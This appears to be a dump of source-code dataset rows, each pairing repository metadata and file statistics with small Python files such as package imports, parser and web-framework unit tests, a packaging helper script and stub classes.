from .login import login_router
from .signup import signup_router
from .todo import todo_router
| 25.2 | 33 | 0.84127 | 20 | 126 | 5.1 | 0.35 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 126 | 4 | 34 | 31.5 | 0.927273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e714c59700ee301507e6458768955f51f29535b8 | 45 | py | Python | rpyc_mem/session/__init__.py | m0hithreddy/rpyc-mem | 72e46da34fe2165a89d702a02ec0bb7b6d64775e | [
"MIT"
] | 1 | 2022-03-12T23:29:13.000Z | 2022-03-12T23:29:13.000Z | rpyc_mem/session/__init__.py | m0hithreddy/rpyc-mem | 72e46da34fe2165a89d702a02ec0bb7b6d64775e | [
"MIT"
] | null | null | null | rpyc_mem/session/__init__.py | m0hithreddy/rpyc-mem | 72e46da34fe2165a89d702a02ec0bb7b6d64775e | [
"MIT"
] | null | null | null | from .rpyc_mem_session import RpycMemSession
| 22.5 | 44 | 0.888889 | 6 | 45 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e72a7cdd88b2fa4cd4bdcba1d02c059ff6bc9c4e | 206 | py | Python | command.py | synsis/m3u8_downloader | 7c7fb3b7230051b92102d8c3f786f1d0194c3260 | [
"MIT"
] | 4 | 2019-03-12T10:07:52.000Z | 2021-02-20T19:21:43.000Z | command.py | synsis/m3u8_downloader | 7c7fb3b7230051b92102d8c3f786f1d0194c3260 | [
"MIT"
] | 1 | 2019-06-23T04:00:38.000Z | 2019-06-23T04:00:38.000Z | command.py | synsis/m3u8_downloader | 7c7fb3b7230051b92102d8c3f786f1d0194c3260 | [
"MIT"
] | 2 | 2019-03-30T20:20:30.000Z | 2020-07-04T12:50:42.000Z | import os
os.system("pip uninstall m3u8-video-downloader")
os.system("python setup.py sdist")
#os.system("python setup.py install")
# os.system("m3u8-video-downloader")
# os.system("twine upload dist/*")
| 22.888889 | 48 | 0.73301 | 31 | 206 | 4.870968 | 0.516129 | 0.264901 | 0.251656 | 0.278146 | 0.582781 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02139 | 0.092233 | 206 | 8 | 49 | 25.75 | 0.786096 | 0.504854 | 0 | 0 | 0 | 0 | 0.565657 | 0.212121 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e74b108e20c7bc84a9c0232dfebf64faec5d1b27 | 12,103 | py | Python | mi/dataset/parser/test/test_adcps_jln_stc.py | ronkyo/mi-dataset | 5ee2d3a5b66c17500e5f7f1b3e4ba7a996a34c45 | [
"BSD-2-Clause"
] | null | null | null | mi/dataset/parser/test/test_adcps_jln_stc.py | ronkyo/mi-dataset | 5ee2d3a5b66c17500e5f7f1b3e4ba7a996a34c45 | [
"BSD-2-Clause"
] | null | null | null | mi/dataset/parser/test/test_adcps_jln_stc.py | ronkyo/mi-dataset | 5ee2d3a5b66c17500e5f7f1b3e4ba7a996a34c45 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_adcps_jln_stc
@file marine-integrations/mi/dataset/parser/test/test_adcps_jln_stc.py
@author Maria Lutz
@brief Test code for a adcps_jln_stc data parser
"""
import os
from nose.plugins.attrib import attr
from mi.core.exceptions import SampleException
from mi.core.log import get_logger
log = get_logger()
from mi.idk.config import Config
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.adcps_jln_stc import AdcpsJlnStcParser, \
AdcpsJlnStcInstrumentTelemeteredDataParticle, \
AdcpsJlnStcInstrumentRecoveredDataParticle, \
AdcpsJlnStcMetadataTelemeteredDataParticle, \
AdcpsJlnStcMetadataRecoveredDataParticle, \
AdcpsJlnStcParticleClassKey
RESOURCE_PATH = os.path.join(Config().base_dir(), 'mi',
'dataset', 'driver', 'adcps_jln',
'stc', 'resource')
@attr('UNIT', group='mi')
class AdcpsJlnStcParserUnitTestCase(ParserUnitTestCase):
"""
adcps_jln_stc Parser unit test suite
"""
def setUp(self):
ParserUnitTestCase.setUp(self)
self._telem_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.adcps_jln_stc',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
AdcpsJlnStcParticleClassKey.METADATA_PARTICLE_CLASS:
AdcpsJlnStcMetadataTelemeteredDataParticle,
AdcpsJlnStcParticleClassKey.INSTRUMENT_PARTICLE_CLASS:
AdcpsJlnStcInstrumentTelemeteredDataParticle,
}
}
self._recov_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.adcps_jln_stc',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
AdcpsJlnStcParticleClassKey.METADATA_PARTICLE_CLASS:
AdcpsJlnStcMetadataRecoveredDataParticle,
AdcpsJlnStcParticleClassKey.INSTRUMENT_PARTICLE_CLASS:
AdcpsJlnStcInstrumentRecoveredDataParticle,
}
}
def test_simple(self):
"""
Read test data and pull out multiple data particles at one time.
Assert that the results are those we expected.
"""
with open(os.path.join(RESOURCE_PATH, 'adcpt_20130929_091817.DAT')) as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(6)
self.assert_particles(result, 'adcpt_20130929_091817.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
with open(os.path.join(RESOURCE_PATH, 'adcpt_20130929_091817.DAT')) as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(6)
self.assert_particles(result, 'adcpt_20130929_091817.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
def test_bad_data_telem(self):
"""
Ensure that bad data is skipped when it exists.
"""
# Bad checksum
# If checksum is bad, skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_checksum.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_checksum.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 1)
self.assert_(isinstance(self.exception_callback_value[0], SampleException))
self.exception_callback_value.pop()
# Incorrect number of bytes
# If numbytes is incorrect, skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_num_bytes.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_num_bytes.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 1)
self.assert_(isinstance(self.exception_callback_value[0], SampleException))
def test_bad_data_recov(self):
"""
Ensure that bad data is skipped when it exists.
"""
# Bad checksum
# If checksum is bad, skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_checksum.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_checksum.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 1)
self.assert_(isinstance(self.exception_callback_value[0], SampleException))
self.exception_callback_value.pop()
# Incorrect number of bytes
# If numbytes is incorrect, skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_num_bytes.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_num_bytes.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 1)
self.assert_(isinstance(self.exception_callback_value[0], SampleException))
def test_receive_fail_telem(self):
# ReceiveFailure
# If record marked with 'ReceiveFailure', skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_rx_failure.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_rx_failure.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
    def test_receive_fail_recov(self):
# ReceiveFailure
# If record marked with 'ReceiveFailure', skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_rx_failure.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_rx_failure.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
def test_real_file(self):
with open(os.path.join(RESOURCE_PATH, 'adcpt_20140504_015742.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(1000)
self.assert_particles(result, 'adcpt_20140504_015742.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
with open(os.path.join(RESOURCE_PATH, 'adcpt_20140504_015742.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(1000)
self.assert_particles(result, 'adcpt_20140504_015742.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
def test_bug_2979_1(self):
"""
Read test data and pull out multiple data particles at one time.
Assert that the results are those we expected.
"""
with open(os.path.join(RESOURCE_PATH, 'adcpt_20140613_105345.DAT')) as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(100)
self.assertEquals(len(result), 13)
self.assertEquals(len(self.exception_callback_value), 0)
def test_bug_2979_2(self):
"""
Read test data and pull out multiple data particles at one time.
Assert that the results are those we expected.
"""
with open(os.path.join(RESOURCE_PATH, 'adcpt_20140707_200310.DAT')) as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(100)
self.assertEquals(len(result), 0)
self.assertEquals(len(self.exception_callback_value), 0)
| 43.851449 | 104 | 0.557217 | 1,137 | 12,103 | 5.692172 | 0.133685 | 0.06026 | 0.097342 | 0.072312 | 0.822775 | 0.822775 | 0.818758 | 0.818758 | 0.801143 | 0.801143 | 0 | 0.025945 | 0.372635 | 12,103 | 275 | 105 | 44.010909 | 0.826419 | 0.098075 | 0 | 0.7 | 0 | 0 | 0.075769 | 0.071087 | 0 | 0 | 0 | 0 | 0.164706 | 1 | 0.052941 | false | 0 | 0.047059 | 0 | 0.105882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
99b7c52aef78481e5522b15a1f211a4f714489d7 | 3,367 | py | Python | tests/test_web_cli.py | ajdavis/aiohttp | d5138978f3e82aa82a2f003b00d38112c58a40c1 | [
"Apache-2.0"
] | 1 | 2021-07-07T06:36:57.000Z | 2021-07-07T06:36:57.000Z | tests/test_web_cli.py | ajdavis/aiohttp | d5138978f3e82aa82a2f003b00d38112c58a40c1 | [
"Apache-2.0"
] | null | null | null | tests/test_web_cli.py | ajdavis/aiohttp | d5138978f3e82aa82a2f003b00d38112c58a40c1 | [
"Apache-2.0"
] | 1 | 2021-02-09T10:05:59.000Z | 2021-02-09T10:05:59.000Z | import pytest
from aiohttp import web
from unittest import mock
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_empty(error):
argv = [""]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"'entry-func' not in 'module:function' syntax"
)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_only_module(error):
argv = ["test"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"'entry-func' not in 'module:function' syntax"
)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_only_function(error):
argv = [":test"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"'entry-func' not in 'module:function' syntax"
)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_only_separator(error):
argv = [":"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"'entry-func' not in 'module:function' syntax"
)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_relative_module(error):
argv = [".a.b:c"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with("relative module names not supported")
@mock.patch("aiohttp.web.import_module", side_effect=ImportError)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_non_existent_module(error, import_module):
argv = ["alpha.beta:func"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with("module %r not found" % "alpha.beta")
@mock.patch("aiohttp.web.import_module")
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_non_existent_attribute(error, import_module):
argv = ["alpha.beta:func"]
module = import_module("alpha.beta")
del module.func
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"module %r has no attribute %r" % ("alpha.beta", "func")
)
@mock.patch("aiohttp.web.run_app")
@mock.patch("aiohttp.web.import_module")
def test_entry_func_call(import_module, run_app):
argv = ("-H testhost -P 6666 --extra-optional-eins alpha.beta:func "
"--extra-optional-zwei extra positional args").split()
module = import_module("alpha.beta")
with pytest.raises(SystemExit):
web.main(argv)
module.func.assert_called_with(
("--extra-optional-eins --extra-optional-zwei extra positional "
"args").split()
)
@mock.patch("aiohttp.web.run_app")
@mock.patch("aiohttp.web.import_module")
@mock.patch("aiohttp.web.ArgumentParser.exit", side_effect=SystemExit)
def test_running_application(exit, import_module, run_app):
argv = ("-H testhost -P 6666 --extra-optional-eins alpha.beta:func "
"--extra-optional-zwei extra positional args").split()
module = import_module("alpha.beta")
app = module.func()
with pytest.raises(SystemExit):
web.main(argv)
run_app.assert_called_with(app, host="testhost", port=6666)
exit.assert_called_with(message="Stopped\n")
| 27.598361 | 72 | 0.700327 | 439 | 3,367 | 5.191344 | 0.159453 | 0.055287 | 0.098289 | 0.116718 | 0.826678 | 0.802984 | 0.789381 | 0.727073 | 0.727073 | 0.703817 | 0 | 0.004264 | 0.164241 | 3,367 | 121 | 73 | 27.826446 | 0.805615 | 0 | 0 | 0.578313 | 0 | 0 | 0.307692 | 0.142857 | 0 | 0 | 0 | 0 | 0.120482 | 1 | 0.108434 | false | 0 | 0.168675 | 0 | 0.277108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
823d3e389e32bf46445c9861aae80fa71d4494c5 | 2,113 | py | Python | misclientes/tests.py | mrbrazzi/django-misclientes | 8017cc67e243e4384c3f52ae73d06e16f8fb8d5b | [
"Apache-2.0"
] | 5 | 2019-11-12T20:35:37.000Z | 2022-03-11T15:02:48.000Z | misclientes/tests.py | mrbrazzi/django-misclientes | 8017cc67e243e4384c3f52ae73d06e16f8fb8d5b | [
"Apache-2.0"
] | 4 | 2019-11-11T15:33:42.000Z | 2022-01-13T01:50:23.000Z | misclientes/tests.py | mrbrazzi/django-misclientes | 8017cc67e243e4384c3f52ae73d06e16f8fb8d5b | [
"Apache-2.0"
] | 4 | 2019-11-11T16:13:20.000Z | 2020-04-02T18:32:06.000Z | from django.test import TestCase
from .models import Enterprise
# Create your tests here.
from django.contrib.auth.models import AnonymousUser, User
from django.test import RequestFactory, TestCase
from .views import index, deletemodel
class AuthTest(TestCase):
def setUp(self):
# Every test needs access to the request factory.
self.factory = RequestFactory()
self.user = User.objects.create_user(
username='jacob', email='jacob@…', password='top_secret')
def test_auth_index_view(self):
# Create an instance of a GET request.
request = self.factory.get('index')
# Recall that middleware are not supported. You can simulate a
# logged-in user by setting request.user manually.
request.user = self.user
# Or you can simulate an anonymous user by setting request.user to
# an AnonymousUser instance.
#request.user = AnonymousUser()
# Test my_view() as if it were deployed at /customer/details
response = index(request)
# Use this syntax for class-based views.
self.assertEqual(response.status_code, 200)
class DeleteModelTest(TestCase):
def setUp(self):
# Every test needs access to the request factory.
self.factory = RequestFactory()
self.user = User.objects.create_user(
username='jacob', email='jacob@…', password='top_secret')
def test_delete_model_view(self):
# Create an instance of a GET request.
request = self.factory.get('deletemodel/42')
# Recall that middleware are not supported. You can simulate a
# logged-in user by setting request.user manually.
#request.user = self.user
# Or you can simulate an anonymous user by setting request.user to
# an AnonymousUser instance.
request.user = AnonymousUser()
# Test my_view() as if it were deployed at /customer/details
response = deletemodel(request)
# Use this syntax for class-based views.
self.assertEqual(response.status_code, 200)
| 35.216667 | 74 | 0.664931 | 265 | 2,113 | 5.271698 | 0.316981 | 0.062992 | 0.040086 | 0.057266 | 0.797423 | 0.797423 | 0.797423 | 0.797423 | 0.797423 | 0.797423 | 0 | 0.005089 | 0.256034 | 2,113 | 60 | 75 | 35.216667 | 0.879771 | 0.400852 | 0 | 0.4 | 0 | 0 | 0.050521 | 0 | 0 | 0 | 0 | 0 | 0.08 | 1 | 0.16 | false | 0.08 | 0.2 | 0 | 0.44 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
413b19012990114edf43266acce810e798a76153 | 133 | py | Python | flask_locate/main/__init__.py | abkfenris/flask-locate | d7295da6fbe65a5cd6047067bca07d9198954ec6 | [
"MIT"
] | null | null | null | flask_locate/main/__init__.py | abkfenris/flask-locate | d7295da6fbe65a5cd6047067bca07d9198954ec6 | [
"MIT"
] | null | null | null | flask_locate/main/__init__.py | abkfenris/flask-locate | d7295da6fbe65a5cd6047067bca07d9198954ec6 | [
"MIT"
] | null | null | null | """
Main public interface to the website
"""
from flask import Blueprint
main = Blueprint('main', __name__)
from . import (views)
| 13.3 | 36 | 0.714286 | 17 | 133 | 5.352941 | 0.705882 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172932 | 133 | 9 | 37 | 14.777778 | 0.827273 | 0.270677 | 0 | 0 | 0 | 0 | 0.044944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
41938f7e871cb62fb94c5c7176f259f3e317d02b | 1,475 | py | Python | test/unit/test_set.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/unit/test_set.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/unit/test_set.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | import sys
import unittest
import math
class SetTestCases(unittest.TestCase):
def test_or(self):
self.assertEqual(set('abcba') | set('cdc'), set('abcd'))
self.assertEqual(set('abcba') | set('efgfe'), set('abcefg'))
self.assertEqual(set('abcba') | set('ccb'), set('abc'))
self.assertEqual(set('abcba') | set('ef'), set('abcef'))
self.assertEqual(set('abcba') | set('ef') | set('fg'), set('abcefg'))
def test_and(self):
self.assertEqual(set('abcba') & set('cdc'), set('cc'))
self.assertEqual(set('abcba') & set('efgfe'), set(''))
self.assertEqual(set('abcba') & set('ccb'), set('bc'))
self.assertEqual(set('abcba') & set('ef'), set(''))
self.assertEqual(set('abcba') & set('cbcf') & set('bag'), set('b'))
def test_sub(self):
self.assertEqual(set('abcba') - set('cdc'), set('ab'))
self.assertEqual(set('abcba') - set('efgfe'), set('abc'))
self.assertEqual(set('abcba') - set('ccb'), set('a'))
self.assertEqual(set('abcba') - set('ef'), set('abc'))
self.assertEqual(set('abcba') - set('a') - set('b'), set('c'))
def test_xor(self):
self.assertEqual(set('abcba') ^ set('cdc'), set('abd'))
self.assertEqual(set('abcba') ^ set('efgfe'), set('abcefg'))
self.assertEqual(set('abcba') ^ set('ccb'), set('a'))
self.assertEqual(set('abcba') ^ set('ef'), set('abcef'))
if __name__ == '__main__':
unittest.main() | 43.382353 | 77 | 0.565424 | 187 | 1,475 | 4.395722 | 0.203209 | 0.346715 | 0.416058 | 0.53163 | 0.788321 | 0.788321 | 0.756691 | 0.517032 | 0.291971 | 0.291971 | 0 | 0 | 0.189153 | 1,475 | 34 | 78 | 43.382353 | 0.687291 | 0 | 0 | 0 | 0 | 0 | 0.150407 | 0 | 0 | 0 | 0 | 0 | 0.655172 | 1 | 0.137931 | false | 0 | 0.103448 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
68fee1a8fd61a5610b3d5d7cdc87c8fab385d1b5 | 91 | py | Python | h5Nastran/h5Nastran/post_process/result_readers/op2/__init__.py | ACea15/pyNastran | 5ffc37d784b52c882ea207f832bceb6b5eb0e6d4 | [
"BSD-3-Clause"
] | 293 | 2015-03-22T20:22:01.000Z | 2022-03-14T20:28:24.000Z | h5Nastran/h5Nastran/post_process/result_readers/op2/__init__.py | ACea15/pyNastran | 5ffc37d784b52c882ea207f832bceb6b5eb0e6d4 | [
"BSD-3-Clause"
] | 512 | 2015-03-14T18:39:27.000Z | 2022-03-31T16:15:43.000Z | h5Nastran/h5Nastran/post_process/result_readers/op2/__init__.py | ACea15/pyNastran | 5ffc37d784b52c882ea207f832bceb6b5eb0e6d4 | [
"BSD-3-Clause"
] | 136 | 2015-03-19T03:26:06.000Z | 2022-03-25T22:14:54.000Z | from __future__ import print_function, absolute_import
from ._op2_reader import OP2Reader
| 22.75 | 54 | 0.868132 | 12 | 91 | 5.916667 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024691 | 0.10989 | 91 | 3 | 55 | 30.333333 | 0.851852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
ec1089c9a7a9e55875084c8662494be919188038 | 151 | py | Python | docker/django/restaurant/restapi/serializers/__init__.py | gitmehedi/cloudtuts | 3008b1cf7fbf22728c9bb2c059c4bd196043a93e | [
"Unlicense"
] | 3 | 2019-08-29T10:14:40.000Z | 2021-03-05T09:50:15.000Z | docker/django/restaurant/restapi/serializers/__init__.py | gitmehedi/cloudtuts | 3008b1cf7fbf22728c9bb2c059c4bd196043a93e | [
"Unlicense"
] | null | null | null | docker/django/restaurant/restapi/serializers/__init__.py | gitmehedi/cloudtuts | 3008b1cf7fbf22728c9bb2c059c4bd196043a93e | [
"Unlicense"
] | 1 | 2021-03-05T09:50:29.000Z | 2021-03-05T09:50:29.000Z | from .foodmenu_serializer import FoodMenuSerializer
from .restaurant_serializer import RestaurantSerializer
from .user_serializer import UserSerializer | 50.333333 | 55 | 0.907285 | 15 | 151 | 8.933333 | 0.6 | 0.358209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072848 | 151 | 3 | 56 | 50.333333 | 0.957143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ec2b72c4754f283c4efaca71eca70932210ff3c0 | 96 | py | Python | venv/lib/python3.8/site-packages/aiohttp/formdata.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | null | null | null | venv/lib/python3.8/site-packages/aiohttp/formdata.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | null | null | null | venv/lib/python3.8/site-packages/aiohttp/formdata.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/50/9e/03/82a5f8264f8b6699ca39e38251ec0be76eb878ee03c873ca3a4e6f828b | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.427083 | 0 | 96 | 1 | 96 | 96 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b5cc43e89d7c5069c70484c8a992ce4d70fc52c | 71 | py | Python | multipay/gateways/paypal.py | sarathak/django-multipay | 27374f6de8b7c04f71145eaba5167e287dae6278 | [
"BSD-3-Clause"
] | null | null | null | multipay/gateways/paypal.py | sarathak/django-multipay | 27374f6de8b7c04f71145eaba5167e287dae6278 | [
"BSD-3-Clause"
] | 5 | 2021-03-18T23:31:58.000Z | 2021-09-22T18:32:59.000Z | multipay/gateways/paypal.py | sarathak/django-multipay | 27374f6de8b7c04f71145eaba5167e287dae6278 | [
"BSD-3-Clause"
] | null | null | null | from multipay.gateway import Gateway
class Paypal(Gateway):
pass
